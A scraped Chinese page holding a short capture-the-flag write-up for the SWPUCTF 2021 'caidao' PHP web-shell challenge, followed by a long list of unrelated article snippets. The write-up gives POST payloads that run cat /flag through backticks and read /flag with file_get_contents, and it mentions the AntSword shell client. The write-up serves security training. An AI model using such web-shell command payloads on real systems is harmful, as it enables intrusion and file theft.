Sx_zzz
Sx_zzz

[SWPUCTF 2021 新生赛]caidao

点开发现需要我们进行POST传参
[SWPUCTF 2021 新生赛]caidao_第1张图片

方法一:

用蚁剑直接连接

在根目录下找到flag
[SWPUCTF 2021 新生赛]caidao_第2张图片

方法二:

构造payload

wllm=echo `cat /flag`;
因为` `内的内容相当于执行系统命令
(也可以位为echo `tac /flag`)

[SWPUCTF 2021 新生赛]caidao_第3张图片

即可得到flag

[SWPUCTF 2021 新生赛]caidao_第4张图片
方法三:

运用函数
构造payload

wllm=var_dump(file_get_contents("/flag"));

注:var_dump()函数用于输出变量的相关信息
file_get_contents()函数用于读取文件

你可能感兴趣的:(命令执行,web安全)

  • pdsh 2.29 源码编译安装教程 云墨丹青 windowsssh
    pdsh2.29源码编译安装教程简介pdsh(ParallelDistributedShell)是一个高效的多服务器并行shell命令执行工具。本文将详细介绍如何从源码编译安装pdsh2.29版本。环境要求Linux操作系统gcc编译器make工具足够的磁盘空间(建议至少1GB可用空间)安装步骤1.下载源码包首先,下载pdsh2.29的源码包:wgethttps://storage.googlea
  • CTFShow-WEB入门篇命令执行详细Wp(29-40)_ctfshow-web入门篇详细wp 2401_84281698 程序员网络安全学习面试
    给大家的福利零基础入门对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:因篇幅有限,仅展示部分资料网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化资料的朋友,可以点击这里获取一个人可以走的很
  • 《白帽子讲web安全》第二三章学习(HTTP,Web应用、浏览器安全) 此乃大忽悠 安全web安全学习
    《白帽子讲web安全》第二三章学习HTTP协议简介HTTP请求HTTP响应WebSocketWeb服务器Web页面文档对象模型(DOM)JavaScript浏览器安全同源策略浏览器沙箱XSS保护隐私策略浏览器扩展高速发展的浏览器安全HTTP协议简介HTTP协议是一种Client-Server协议,所以只能由客户端单向发起请求,服务端再响应请求。这里的客户端也叫用户代理(UserAgent),在大多
  • 2024年最新Web应用安全威胁与防护措施(3) 2401_84240129 程序员前端安全网络
    许多金融企业会让员工不受限地访问各类文档资源,他们甚至可以访问到本企业内部大约17%的敏感文件(约1100万个文件)。平均而言,只有5%的公司文件夹受到了适当的保护。而且,有超过77%的企业并无事件响应计划。可见,针对上述威胁,我们应采取主动的Web安全策略,以及严格的措施,来确保敏感的数据信息、Web应用、以及信息系统等资产,免受攻击与侵害。下面,我将和您讨论五种最主要的Web应用安全威胁,以及
  • Web安全攻防:渗透测试实战指南(徐焱)(Z-Library) 快乐的红中 渗透测试web安全安全xss网络javapython
    目录作者简介······目录······《Web安全攻防:渗透测试实战指南》由浅入深、全面、系统地介绍了当前流行的高危漏洞的攻击手段和防御方法,并力求语言通俗易懂,举例简单明了,便于读者阅读、领会。结合具体案例进行讲解,可以让读者身临其境,快速地了解和掌握主流的漏洞利用技术与渗透测试技巧。阅读《Web安全攻防:渗透测试实战指南》不要求读者具备渗透测试的相关背景,如有相关经验在理解时会更有帮助。《W
  • Web 学习笔记 - 网络安全 网络安全Max 前端笔记
    前言作为前端开发者,了解一点Web安全方面的基本知识是有很必要的,未必就要深入理解。本文主要介绍常见的网络攻击类型,不作深入探讨。正文网络攻击的形式种类繁多,从简单的网站敏感文件扫描、弱口令暴力破解,到SQL注入,再到复杂的网络劫持等,种类万千。本文只介绍以下两种攻击:XSS攻击CSRF攻击如果你对其他更高大上的网络攻击有兴趣,可以点击这里:Web安全学习笔记-高级网络攻击。XSS攻击XSS,跨站
  • Redis 作者 Antirez 讲如何实现分布式锁?Redis 实现分布式锁天然的缺陷分析&Redis分布式锁的正确使用姿势!... AI天才研究院 架构师必知必会系列redis分布式数据库java缓存
    Redis分布式锁基本原理采用redis实现分布式锁,主要是利用其单线程命令执行的特性,一般是setnx,只会有一个线程会执行成功,也就是只有一个线程能成功获取锁;看着很完美。然而——看看可能有什么问题?一般生产环境为了可用性,redis会部署master-slave+sentinel的结构,如:master提供服务、slavestandby作为备份节点不提供服务,master异步将数据复制给sl
  • Struts2 命令执行漏洞 S2-045 复现:深入剖析与实战演练 垚垚 Securify 前沿站 十大漏洞网络系统安全web安全struts安全计算机网络后端
    目录前言一、漏洞原理:框架解析缺陷引发的安全危机二、复现环境搭建:搭建模拟战场,重现漏洞场景三、复现步骤:步步为营,揭开漏洞利用的面纱四、漏洞危害与修复建议:正视漏洞危害,筑牢安全防线前言在当今网络安全形势日益严峻的大环境下,Web应用框架的安全问题始终是信息安全领域关注的焦点。Struts2作为一款广泛应用于JavaWeb开发的开源框架,其安全性直接关系到众多Web应用的稳定运行。今天,我们将深
  • HTTP协议系列----------- HTTP协议相关的Web安全问题 FreeQuantum 网络基础http协议安全
    一、确保Web安全的HTTPS二、确认访问用户身份的认证三、Web的攻击技术四、基于HTTP的功能追加协议
  • web安全HTTP协议基础 飞飞鱼_ web安全web安全
    1、HTTP方法请求方法描述GET请求获取URL资源POST执行操作,请求URL资源后附加新的数据HEAD只获取资源响应消息的报头PUT请求服务器存储一个资源DELETE请求服务器删除资源TRACE请求服务器回送到的信息OPTIONS查询服务器的支持选项2、URL常见URL格式:protocol://[user[:password]@]hostname[:post]/[path]/file[?pa
  • 通过Dockerfile build mysql镜像 初始化mysql数据库 CsbLanca 数据库mysql
    做什么#1.docker下mysql镜像容器初始化#2.将初始化sql文件通过init.sql文件内的SOURCE命令执行#3.容器启动起来,mysql内就有相应的初始化数据了先看目录结构├──Dockerfile├──README.md├──init.sql└──xxx├──dir1│├──sys_user.sql│├──sys_org.sql1.build镜像的Dockerfile#选择基础镜
  • redis之服务端 小码农0912 redisredisredis之服务端初始化流程redis之服务端启动流程
    文章目录命令请求的执行过程发送命令请求14.1.2读取命令请求命令执行器(1):查找命令实现14.1.4命令执行器(2):执行预备操作命令执行器(3);调用命令的实现函数命令执行器(4):执行后续工作将命令回复发送给客户端客户端接收并打印命令回复ServerCron函数更新服务器时间缓存更新LRU时钟更新服务器每秒执行命令次数更新服务器内存峰值记录处理SIGTERM信号管理客户端资源管理数据库资源
  • 持续集成环境问题汇总(基于:java + testng + httpclient + allure + git + gitlab + jenkins + pipeline + maven + harb... 全栈测试笔记 jenkinsjavacigitgitlab
    说明包含前期调试遇到的问题idea中,命令执行testng.xml,报错PleaserefertoD:\myjava\apiAutoTest\target\surefire-reportsfortheindividualtestresults.参考:https://www.cnblogs.com/uncleyong/p/16705982.html无法连接仓库:Hostkeyverification
  • 【MySQL例题】我在广州学Mysql 系列——有关数据备份与还原的示例 练小杰 数据库相关MYSQL数据库练习题mysql数据库经验分享学习androidsql
    ℹ️大家好,我是练小杰,今天周二,明天就是元宵节了呀!!俗话说“众里寻他千百度。蓦然回首,那人却在,灯火阑珊处。”本文主要对数据库备份与还原的知识点例题学习~~前情回顾:【MySQL数据备份与还原详解】数据库专栏:【数据库专栏】【Mysql练习题】了解更多,点击主页:【练小杰的CSDN】文章目录俗话说“众里寻他千百度。蓦然回首,那人却在,灯火阑珊处。”前言实验准备创建数据库及定义表命令执行完毕后,
  • 【进程与线程】如何编写一个守护进程 猫猫的小茶馆 #线程与进程linuxgit运维c语言mcu单片机
    如何编写一个守护进程。我们首先需要理解守护进程是什么。守护进程是在后台运行的进程,通常没有控制终端,用于执行系统任务,比如服务器或者定时任务。用户可能想创建一个长期运行的服务,比如Web服务器或者日志监控程序。首先,守护进程的创建通常包括几个步骤:fork子进程,让父进程退出,这样终端会认为命令执行完毕,子进程继续运行。然后调用setsid创建新的会话,脱离终端。接着改变工作目录到根目录,避免占用
  • 网络安全 | 什么是XSS跨站脚本攻击? Andya_net 网络安全技术web安全xss网络
    关注:CodingTechWorkXSS介绍  XSS(Cross-SiteScripting)即跨站脚本攻击,是一种常见的Web安全漏洞。攻击者通过将恶意脚本嵌入到Web页面中,当用户访问该页面时,脚本就会在用户的浏览器中执行,从而窃取用户数据、篡改页面内容、或执行其他恶意操作。  XSS攻击主要依赖于Web应用没有对用户输入进行有效的过滤与校验,允许攻击者将恶意代码插入到网页中。这类攻击主要有
  • 2025年黑客(网络安全)技术自学——高效学习 程序员羊羊 web安全学习网络开发语言安全
    一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你是一
  • 利用二分法进行 SQL 时间盲注 智商不在服务器 渗透攻击数据库python
    什么是时间盲注?SQL盲注(BlindSQLInjection)是一种常见的Web安全漏洞,其中时间盲注是基于查询延迟的SQL注入方式。当服务器不返回可见的错误信息时,我们可以利用SLEEP()函数来判断查询结果是否符合预期。代码解析本代码通过二分法+时间盲注逐字符提取数据库中的信息。它通过SLEEP()让服务器延迟响应,从而判断SQL条件是否成立。importrequestsimportconc
  • 信安教程第二版-第22章网站安全需求分析与安全保护工程 鹿鸣天涯
    第22章网站安全需求分析与安全保护工程22.1网站安全威胁与需求分析47322.1.1网站安全概念47322.1.2网站安全分析47422.1.3网站安全需求47522.2ApacheWeb安全分析与增强47622.2.1ApacheWeb概述47622.2.2ApacheWeb安全分析47622.2.3ApacheWeb安全机制47722.2.4ApacheWeb安全增强48022.3IIS安全
  • 22.2、Apache安全分析与增强 山兔1 信息安全工程师apache安全
    目录ApacheWeb安全分析与增强-ApacheWeb概述ApacheWeb安全分析与增强-ApacheWeb安全威胁ApacheWeb安全机制ApacheWeb安全增强ApacheWeb安全分析与增强-ApacheWeb概述阿帕奇是一个用于搭建WEB服务器的应用程序,它是开源的,它的配置文件主要有四个,httpd.conf,这个文件是最核心最主要的,它是我们的主配置文件,里面存的是网站的一些属
  • 运维经典面试题总结100道(含答案)---2024常见面试题 helpme流水 运维面试简历linux运维centos
    目录1.不能关机的情况下,如果挂载目录卸载不掉应该怎么办2.如果你向文件系统中写入数据,发现无法写入,怎么处理3.客户反映服务器卡顿,你会怎么排查4.如果你在执行命令时,发现Linux系统命令执行速度很慢,你会怎么解决5.了解七层模型吗,说一下;TCP协议和UDP协议的区别是什么;二层和三层的交换机有什么区别,说一下6.说一下TCP三次握手和四次挥手7.为什么四次挥手时要有一个TIME_WAIT状
  • 安恒网安面试题来啦! 网络安全Max 网络服务器运维web安全
    1.什么是WebShell?WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的─种命令执行环境,也可以将其称做为─种网页后门。黑客在入侵了─个网站后,通常会将这些asp或php后门文件与网站服务器WEB目录下正常的网页文件混在─起,然后就可以使用浏览器来访问这些asp或者php后门,得到─个命令执行环境,以达到控制网站服务器的目的(可以上传下载文件,查看数据库,执行任意程序
  • 2024年hw蓝队初级面试总结_weblogic反序列化流量特征(1) 2401_84254530 面试职场和发展
    apache:解析漏洞1.php%0a换行解析1.php.xxx未知后缀解析SSI远程命令执行路径穿越nginx:解析漏洞1.jpg/.php目录穿越(nginx配置别名的时候alias的时候,忘记加/将造成目录穿越漏洞)CRLF注入(Nginx会将$uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞)jboss:反序列化war后门部署weblogic:反序列化ssrf任意文
  • web安全渗透测试十大常规项(一):web渗透测试之Fastjson反序列化 HACKNOE Web渗透测试基础实验室web安全java网络安全
    渗透测试之Java反序列化1.Fastjson反序列化1.1FastJson反序列化链知识点1.2FastJson反序列化链分析1.3.1FastJson1.2.24利用链分析1.3.2FastJson1.2.25-1.2.47CC链分析1.3.2.1、开启autoTypeSupport:1.2.25-1.2.411.3.2.2fastjson-1.2.42版本绕过1.3.2.3fastjson-
  • Redis性能优化 赤橙红的黄 缓存Redisredis缓存
    1.是否使用复杂度过高的命令首先,第一步,你需要去查看一下Redis的慢日志(slowlog)。Redis提供了慢日志命令的统计功能,它记录了有哪些命令在执行时耗时比较久。查看Redis慢日志之前,你需要设置慢日志的阈值。例如,设置慢日志的阈值为5毫秒,并且保留最近500条慢日志记录:redis-cli-h127.0.0.1-p6379#命令执行耗时超过5微秒,记录慢日志CONFIGSETslow
  • 破解加密 猪猪_女孩 爬虫pythonajax爬虫csshtml
    一.CSS加密CSS加密:比较简单CSS—>层叠样式表,操作样式CSS都是对字体进行加密处理的,在网页源代码中显示[&#x+16进制数;]分析:找到css加密文件即可@font-face是CSS中的一个模块,作用:可以将自定义的字体嵌入到网页中,让网页的字体不仅仅限定在WEB安全字体从css文件中找到包含字体的woff文件有时候会出现多个woff,多个里面肯定会有一个或者几个woff文件是对网页的
  • 追洞计划 | Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214) Ms08067安全实验室 javagit安全gitlabdocker
    文章来源|MS08067Web安全知识星球本文作者:Taoing(Web安全攻防合伙人)GitLab是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务。一、漏洞描述GitLab是美国GitLab公司的一款使用RubyonRails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。CVE-20
  • 系统的延迟任务及定时任务 ~时泪~ 服务器linux运维
    一.延迟任务在系统中我们的维护工作大多数时在服务器行对闲置时进行我们需要用延迟任务来解决自动进行的一次性的维护延迟任务时一次性的,不会重复执行当延迟任务产生输出后,这些输出会以邮件的形式发送给延迟任务发起者(1)延迟任务的发起在系统中我们可以使用at命令来发起延迟任务at命令执行是调用的是atd服务,即使系统最小化安装atd也会被安装到系统中at任务信息存放在系统中/var/spool/at目录中
  • python是如何运行程序的? vinkuan pythonpython
    从实现方式上看,python是一个名为解释器的软件包。解释器是一种让其他程序运行起来的程序。当编写一段python程序,Pyhton解释器将读取程序,并按照其中的命令执行,得出结果。实际上,解释器是代码与机器的计算机硬件之间的软件逻辑层。Python安装包至少包含一个解释器和一套支持库。程序执行从程序员的视角来看,Python程序是一个包含Python语句的文本文件。按照惯例,Python文件是以
  • 看Java代码,学命令注入 IronSec java开发语言
    声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。关注VX公粽号“信安魔方”查阅更多实战案例!Part-01命令注入基本知识命令执行漏洞是指应用有时需要调用一些执行系统命令的函数,如果系统命令代码未对用户可控参数做过滤,则当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从
  • jvm调优总结(从基本概念 到 深度优化) oloz javajvmjdk虚拟机应用服务器
    JVM参数详解:http://www.cnblogs.com/redcreen/archive/2011/05/04/2037057.html   Java虚拟机中,数据类型可以分为两类:基本类型和引用类型。基本类型的变量保存原始值,即:他代表的值就是数值本身;而引用类型的变量保存引用值。“引用值”代表了某个对象的引用,而不是对象本身,对象本身存放在这个引用值所表示的地址的位置。
  • 【Scala十六】Scala核心十:柯里化函数 bit1129 scala
    本篇文章重点说明什么是函数柯里化,这个语法现象的背后动机是什么,有什么样的应用场景,以及与部分应用函数(Partial Applied Function)之间的联系   1. 什么是柯里化函数 A way to write functions with multiple parameter lists. For instance def f(x: Int)(y: Int) is a
  • HashMap dalan_123 java
    HashMap在java中对很多人来说都是熟的;基于hash表的map接口的非同步实现。允许使用null和null键;同时不能保证元素的顺序;也就是从来都不保证其中的元素的顺序恒久不变。 1、数据结构     在java中,最基本的数据结构无外乎:数组 和 引用(指针),所有的数据结构都可以用这两个来构造,HashMap也不例外,归根到底HashMap就是一个链表散列的数据
  • Java Swing如何实时刷新JTextArea,以显示刚才加append的内容 周凡杨 java更新swingJTextArea
    在代码中执行完textArea.append("message")后,如果你想让这个更新立刻显示在界面上而不是等swing的主线程返回后刷新,我们一般会在该语句后调用textArea.invalidate()和textArea.repaint()。 问题是这个方法并不能有任何效果,textArea的内容没有任何变化,这或许是swing的一个bug,有一个笨拙的办法可以实现
  • servlet或struts的Action处理ajax请求 g21121 servlet
    其实处理ajax的请求非常简单,直接看代码就行了: //如果用的是struts //HttpServletResponse response = ServletActionContext.getResponse(); // 设置输出为文字流 response.setContentType("text/plain"); // 设置字符集 res
  • FineReport的公式编辑框的语法简介 老A不折腾 finereport公式总结
    FINEREPORT用到公式的地方非常多,单元格(以=开头的便被解析为公式),条件显示,数据字典,报表填报属性值定义,图表标题,轴定义,页眉页脚,甚至单元格的其他属性中的鼠标悬浮提示内容都可以写公式。 简单的说下自己感觉的公式要注意的几个地方:   1.if语句语法刚接触感觉比较奇怪,if(条件式子,值1,值2),if可以嵌套,if(条件式子1,值1,if(条件式子2,值2,值3)
  • linux mysql 数据库乱码的解决办法 墙头上一根草 linuxmysql数据库乱码
    linux 上mysql数据库区分大小写的配置 lower_case_table_names=1 1-不区分大小写 0-区分大小写   修改/etc/my.cnf 具体的修改内容如下:   [client] default-character-set=utf8   [mysqld] datadir=/var/lib/mysql socket=/va
  • 我的spring学习笔记6-ApplicationContext实例化的参数兼容思想 aijuans Spring 3
    ApplicationContext能读取多个Bean定义文件,方法是: ApplicationContext appContext = new ClassPathXmlApplicationContext( new String[]{“bean-config1.xml”,“bean-config2.xml”,“bean-config3.xml”,“bean-config4.xml
  • mysql 基准测试之sysbench annan211 基准测试mysql基准测试MySQL测试sysbench
    1 执行如下命令,安装sysbench-0.5: tar xzvf sysbench-0.5.tar.gz  cd sysbench-0.5  chmod +x autogen.sh  ./autogen.sh  ./configure --with-mysql --with-mysql-includes=/usr/local/mysql
  • sql的复杂查询使用案列与技巧 百合不是茶 oraclesql函数数据分页合并查询
      本片博客使用的数据库表是oracle中的scott用户表;          -------------------  自然连接查询           查询 smith 的上司(两种方法) &
  • 深入学习Thread类 bijian1013 javathread多线程java多线程
    一.             线程的名字 下面来看一下Thread类的name属性,它的类型是String。它其实就是线程的名字。在Thread类中,有String getName()和void setName(String)两个方法用来设置和获取这个属性的值。 同时,Thr
  • JSON串转换成Map以及如何转换到对应的数据类型 bijian1013 javafastjsonnet.sf.json
            在实际开发中,难免会碰到JSON串转换成Map的情况,下面来看看这方面的实例。另外,由于fastjson只支持JDK1.5及以上版本,因此在JDK1.4的项目中可以采用net.sf.json来处理。 一.fastjson实例 JsonUtil.java package com.study; impor
  • 【RPC框架HttpInvoker一】HttpInvoker:Spring自带RPC框架 bit1129 spring
    HttpInvoker是Spring原生的RPC调用框架,HttpInvoker同Burlap和Hessian一样,提供了一致的服务Exporter以及客户端的服务代理工厂Bean,这篇文章主要是复制粘贴了Hessian与Spring集成一文,【RPC框架Hessian四】Hessian与Spring集成   在 【RPC框架Hessian二】Hessian 对象序列化和反序列化一文中
  • 【Mahout二】基于Mahout CBayes算法的20newsgroup的脚本分析 bit1129 Mahout
    #!/bin/bash # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information re
  • nginx三种获取用户真实ip的方法 ronin47
    随着nginx的迅速崛起,越来越多公司将apache更换成nginx. 同时也越来越多人使用nginx作为负载均衡, 并且代理前面可能还加上了CDN加速,但是随之也遇到一个问题:nginx如何获取用户的真实IP地址,如果后端是apache,请跳转到<apache获取用户真实IP地址>,如果是后端真实服务器是nginx,那么继续往下看。 实例环境: 用户IP 120.22.11.11
  • java-判断二叉树是不是平衡 bylijinnan java
    参考了 http://zhedahht.blog.163.com/blog/static/25411174201142733927831/ 但是用java来实现有一个问题。 由于Java无法像C那样“传递参数的地址,函数返回时能得到参数的值”,唯有新建一个辅助类:AuxClass import ljn.help.*; public class BalancedBTree {
  • BeanUtils.copyProperties VS PropertyUtils.copyProperties 诸葛不亮 PropertyUtilsBeanUtils
     BeanUtils.copyProperties VS  PropertyUtils.copyProperties  作为两个bean属性copy的工具类,他们被广泛使用,同时也很容易误用,给人造成困然;比如:昨天发现同事在使用BeanUtils.copyProperties copy有integer类型属性的bean时,没有考虑到会将null转换为0,而后面的业
  • [金融与信息安全]最简单的数据结构最安全 comsci 数据结构
          现在最流行的数据库的数据存储文件都具有复杂的文件头格式,用操作系统的记事本软件是无法正常浏览的,这样的情况会有什么问题呢?        从信息安全的角度来看,如果我们数据库系统仅仅把这种格式的数据文件做异地备份,如果相同版本的所有数据库管理系统都同时被攻击,那么
  • vi区段删除 Cwind linuxvi区段删除
    区段删除是编辑和分析一些冗长的配置文件或日志文件时比较常用的操作。简记下vi区段删除要点备忘。   vi概述    引文中并未将末行模式单独列为一种模式。单不单列并不重要,能区分命令模式与末行模式即可。   vi区段删除步骤: 1. 在末行模式下使用:set nu显示行号 非必须,随光标移动vi右下角也会显示行号,能够正确找到并记录删除开始行
  • 清除tomcat缓存的方法总结 dashuaifu tomcat缓存
    用tomcat容器,大家可能会发现这样的问题,修改jsp文件后,但用IE打开 依然是以前的Jsp的页面。 出现这种现象的原因主要是tomcat缓存的原因。 解决办法如下: 在jsp文件头加上 <meta http-equiv="Expires" content="0"> <meta http-equiv="kiben&qu
  • 不要盲目的在项目中使用LESS CSS dcj3sjt126com Webless
     如果你还不知道LESS CSS是什么东西,可以看一下这篇文章,是我一朋友写给新人看的《CSS——LESS》   不可否认,LESS CSS是个强大的工具,它弥补了css没有变量、无法运算等一些“先天缺陷”,但它似乎给我一种错觉,就是为了功能而实现功能。   比如它的引用功能 ? .rounded_corners{     
  • [入门]更上一层楼 dcj3sjt126com PHPyii2
    更上一层楼 通篇阅读完整个“入门”部分,你就完成了一个完整 Yii 应用的创建。在此过程中你学到了如何实现一些常用功能,例如通过 HTML 表单从用户那获取数据,从数据库中获取数据并以分页形式显示。你还学到了如何通过 Gii 去自动生成代码。使用 Gii 生成代码把 Web 开发中多数繁杂的过程转化为仅仅填写几个表单就行。 本章将介绍一些有助于更好使用 Yii 的资源:
  • Apache HttpClient使用详解 eksliang httpclienthttp协议
    Http协议的重要性相信不用我多说了,HttpClient相比传统JDK自带的URLConnection,增加了易用性和灵活性(具体区别,日后我们再讨论),它不仅是客户端发送Http请求变得容易,而且也方便了开发人员测试接口(基于Http协议的),即提高了开发的效率,也方便提高代码的健壮性。因此熟练掌握HttpClient是很重要的必修内容,掌握HttpClient后,相信对于Http协议的了解会
  • zxing二维码扫描功能 gundumw100 androidzxing
    经常要用到二维码扫描功能 现给出示例代码 import com.google.zxing.WriterException; import com.zxing.activity.CaptureActivity; import com.zxing.encoding.EncodingHandler; import android.app.Activity; import an
  • 纯HTML+CSS带说明的黄色导航菜单 ini htmlWebhtml5csshovertree
    HoverTree带说明的CSS菜单:纯HTML+CSS结构链接带说明的黄色导航   在线体验效果:http://hovertree.com/texiao/css/1.htm代码如下,保存到HTML文件可以看到效果:   <!DOCTYPE html > <html > <head> <title>HoverTree
  • fastjson初始化对性能的影响 kane_xie fastjson序列化
    之前在项目中序列化是用thrift,性能一般,而且需要用编译器生成新的类,在序列化和反序列化的时候感觉很繁琐,因此想转到json阵营。对比了jackson,gson等框架之后,决定用fastjson,为什么呢,因为看名字感觉很快。。。   网上的说法:   fastjson 是一个性能很好的 Java 语言实现的 JSON 解析器和生成器,来自阿里巴巴的工程师开发。
  • 基于Mybatis封装的增删改查实现通用自动化sql mengqingyu DAO
    1.基于map或javaBean的增删改查可实现不写dao接口和实现类以及xml,有效的提高开发速度。 2.支持自定义注解包括主键生成、列重复验证、列名、表名等 3.支持批量插入、批量更新、批量删除 <bean id="dynamicSqlSessionTemplate" class="com.mqy.mybatis.support.Dynamic
  • js控制input输入框的方法封装(数字,中文,字母,浮点数等) qifeifei javascript js
    在项目开发的时候,经常有一些输入框,控制输入的格式,而不是等输入好了再去检查格式,格式错了就报错,体验不好。 /** 数字,中文,字母,浮点数(+/-/.) 类型输入限制,只要在input标签上加上 jInput="number,chinese,alphabet,floating" 备注:floating属性只能单独用*/     funct
  • java 计时器应用 tangqi609567707 javatimer
    mport java.util.TimerTask;   import java.util.Calendar;   public class MyTask extends TimerTask {        private static final int
  • erlang输出调用栈信息 wudixiaotie erlang
    在erlang otp的开发中,如果调用第三方的应用,会有有些错误会不打印栈信息,因为有可能第三方应用会catch然后输出自己的错误信息,所以对排查bug有很大的阻碍,这样就要求我们自己打印调用的栈信息。用这个函数:erlang:process_display (self (), backtrace).需要注意这个函数只会输出到标准错误输出。 也可以用这个函数:erlang:get_s
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他